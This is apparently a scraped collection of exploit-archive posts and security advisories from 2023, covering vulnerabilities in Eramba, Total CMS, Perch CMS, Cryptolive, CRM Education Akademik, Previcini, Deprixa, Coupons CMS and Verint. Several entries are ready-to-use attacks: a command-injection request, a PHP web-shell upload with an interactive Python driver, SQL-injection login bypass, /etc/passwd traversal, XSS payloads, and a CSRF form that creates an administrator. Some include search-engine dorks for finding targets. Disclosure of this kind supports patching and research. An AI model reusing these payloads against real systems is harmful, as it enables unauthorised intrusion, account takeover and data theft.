An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.

**Authenticated remote code execution in Eramba****Overview**

Advisory ID: TRSA-2303-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2303-01  
Affected product: Eramba  
Affected version: 3.19.1 (Enterprise and Community edition)  
Vendor: Eramba Limited, https://www.eramba.org  
Credits: Trovent Security GmbH, Sergey Makarov

**Detailed description**

Eramba is a web application for managing Governance, Risk, and Compliance (GRC).  
Trovent Security GmbH discovered that the Eramba web application allows remote code execution for authenticated users.  
A possible attacker is able to modify the parameter “path” in the URL “https://hostname/settings/download-test-pdf?path=” to execute arbitrary commands in the context of the user account the application is running in.  
To see the output of the executed command in the HTTP response, debug mode has to be enabled.

Severity: High  
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE ID: CVE-2023-36255  
CWE ID: CWE-94

**Proof of concept**

HTTP request:

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: \[redacted\]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://\[redacted\]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: \*
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER\_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid\_lft forever preferred\_lft forever
    inet6 ::1/128 scope host
       valid\_lft forever preferred\_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER\_UP&gt; mtu 1500 qdisc fq\_codel state UP group default qlen 1000
    link/ether \[redacted\] brd ff:ff:ff:ff:ff:ff
    inet \[redacted\] brd \[redacted\] scope global ens33
       valid\_lft forever preferred\_lft forever
    inet6 \[redacted\] scope link
       valid\_lft forever preferred\_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp\_snappy6426d4231040e1.91046751.html'
'/tmp/knp\_snappy6426d423104587.46971034.pdf'. </title>

\[...\]

**Solution / Workaround**

The vendor released a fixed version of Eramba.

Fixed in version 3.19.2.

**History**

2023-03-31: Vulnerability found  
2023-04-04: Vendor contacted  
2023-04-17: Vendor confirmed vulnerability  
2023-04-20: Vendor released fixed version  
2023-05-25: Trovent verified remediation of the vulnerability  
2023-06-13: CVE ID requested  
2023-07-28: CVE ID received  
2023-08-01: Advisory published

CVE-2023-36255: Security Advisory 2303-01 - Trovent Security GmbH

File Upload vulnerability in Total CMS v.1.7.4 allows a remote attacker to execute arbitrary code via a crafted PHP file to the edit page function.

    # Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023# Exploit Author: tmrswrr# Version: 1.7.4# Vendor home page : https://www.totalcms.co/# Tested Url : https://www.totalcms.co/demo/soccer/#PLatform : MACOSX1) Go to this page and click edit page buttonhttps://localhost/demo/soccer/2)After go down and will you see downloads area 3)Add in this area shell.php file?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND4) After open this file and write commandshttps://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=idResult :?PNG ...uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)IEND Exploit: import requestsurl = input("Enter the URL: ")urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php"headers = {    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',    'Accept': 'application/json',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Cache-Control': 'no-cache',    'X-Requested-With': 'XMLHttpRequest',    'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17',    'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930',    'Origin': urll,    'Dnt': '1',    'Referer': f'{urll}/demo/soccer/admin/',    'Sec-Fetch-Dest': 'empty',    'Sec-Fetch-Mode': 'cors',    'Sec-Fetch-Site': 'same-origin',    'Te': 'trailers',    'Connection': 'close'}data = '''\-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="slug"\r\n\r\ncmssoccerdepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="type"\r\n\r\ndepot\r\n-----------------------------17104855723143716151436432930\r\nContent-Disposition: form-data; name="file"; filename="hey.php"\r\nContent-Type: application/x-php\r\n\r\n?PNG...<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>IEND\r\n\r\n-----------------------------17104855723143716151436432930--'''while True:    command = input("WRITE YOUR COMMAND ('exit' to quit): ")    if command.lower() == "exit":        break    response = requests.post(url, headers=headers, data=data)    if response.status_code == 200:        shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}'        shell_url = url + shell_path        print(shell_url)        shell_response = requests.get(shell_url)        print(shell_response.text)    else:        print('Failed to execute the request.')

CVE-2023-36212: Total CMS 1.7.4 Shell Upload ≈ Packet Storm

Ubuntu Security Notice 6267-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Max Vlasov discovered that Firefox Offscreen Canvas did not properly track cross-origin tainting. An attacker could potentially exploit this issue to access image data from another site in violation of same-origin policy.

    ==========================================================================Ubuntu Security Notice USN-6267-1August 02, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-4047,CVE-2023-4048, CVE-2023-4049, CVE-2023-4051, CVE-2023-4053, CVE-2023-4055,CVE-2023-4056, CVE-2023-4057, CVE-2023-4058)Max Vlasov discovered that Firefox Offscreen Canvas did not properly trackcross-origin tainting. An attacker could potentially exploit this issue toaccess image data from another site in violation of same-origin policy.(CVE-2023-4045)Alexander Guryanov discovered that Firefox did not properly update thevalue of a global variable in WASM JIT analysis in some circumstances. Anattacker could potentially exploit this issue to cause a denial of service.(CVE-2023-4046)Mark Brand discovered that Firefox did not properly validate the size ofan untrusted input stream. An attacker could potentially exploit this issueto cause a denial of service. (CVE-2023-4050)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         116.0+build2-0ubuntu0.20.04.2After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6267-1  CVE-2023-4045, CVE-2023-4046, CVE-2023-4047, CVE-2023-4048,  CVE-2023-4049, CVE-2023-4050, CVE-2023-4051, CVE-2023-4053,  CVE-2023-4055, CVE-2023-4056, CVE-2023-4057, CVE-2023-4058Package Information:  https://launchpad.net/ubuntu/+source/firefox/116.0+build2-0ubuntu0.20.04.2

Ubuntu Security Notice USN-6267-1

Perch CMS version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:# Date: 07/2023# Exploit Author: Andrey Stoykov# Version: 3.2# Tested on: Windows Server 2022# Blog: http://msecureltd.blogspot.comXSS #1:File: roles.edit.post.phpLine #57:[...]<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">        <?php echo $Form->label('roleTitle', 'Title'); ?>        <div class="form-entry">            <?php echo $Form->text('roleTitle', $Form->get($details,'roleTitle')); ?>        </div>    </div>[...]Steps to Reproduce:1. Login to application2. Go to Roles3. Select Title4. Enter payload TEST"><img src=x onerror=alert(1)>// HTTP POST requestPOST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1Host: 192.168.1.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/114.0[...]roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0// HTTP responseHTTP/1.1 200 OKServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4[...][...]<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=xonerror=alert(1)></a>[...]

Perch CMS 3.2 Cross Site Scripting

Cryptolive CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Cryptolive cms v1.0 Auth by pass Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://scriptmafia.org/                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] user & pass : 1'or'1'='1[+] Panel : https://127.0.0.1/cryptoinlivecom/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Cryptolive CMS 1.0 SQL Injection

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

CREDITS PREVICINI CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CREDITS PREVICINI CMS v1.02 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.previcinidesign.com/                                                                                    |  | # Dork      : inurl:id= Or Web by PREVICINIDESIGN & php?id=                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/amarcordpiadineriait/notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CREDITS PREVICINI CMS 1.02 Cross Site Scripting

Courier Deprixa Pro Integrated Web System version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |    
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : settings/addusersadmin/agregar.php

[+] save code as poc.html .

<div class="modal-content">  
              <div class="modal-header">  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/bluedotcourriercom/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input class="form-control email" name="email" id="id_mail" placeholder="demo@demo.com" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" data-parsley-id="12">  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text">  
                  </div>  
                  </div>  
                  <br><br>  
                    <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>  
                         
          </div>  
            
          </div>  
        </div>         
        </div>  
          
      </div>  
      </div>  
            
    </div>  
    </div>  
  </div>  
  

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Courier Deprixa Pro Integrated Web System 3.2.5 Cross Site Request Forgery

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Verint Engagement Management 15.3 Update 2023R2 is vulnerable to HTML injection via the user data form in the live chat.

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.  
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

    POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 234
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    {"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
    "customerEmail":"<h1>ee@recoil.nl</h1>",
    "customerLocale":"<h1>nl</h1>",
    "chatLaunchMode":"CHAT_ONLY",
    "refererURL":"<h1>https://recoil.nl<h1>",
    "launchCode":"KanaChat",
    "launchIdentifier":"KanaChat"}
    

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

    HTTP/1.1 201 Created
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:44:58 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly
    
    {"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
    "userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
    "userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

With the following request we can spawn a chat box.

    POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 41
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    [
    	{
    		"type":"MessageSent",
    		"text":"123test"
    	}
    ]
    

Response:

    HTTP/1.1 200 OK
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:45:07 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    
    {"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

Tag

#firefox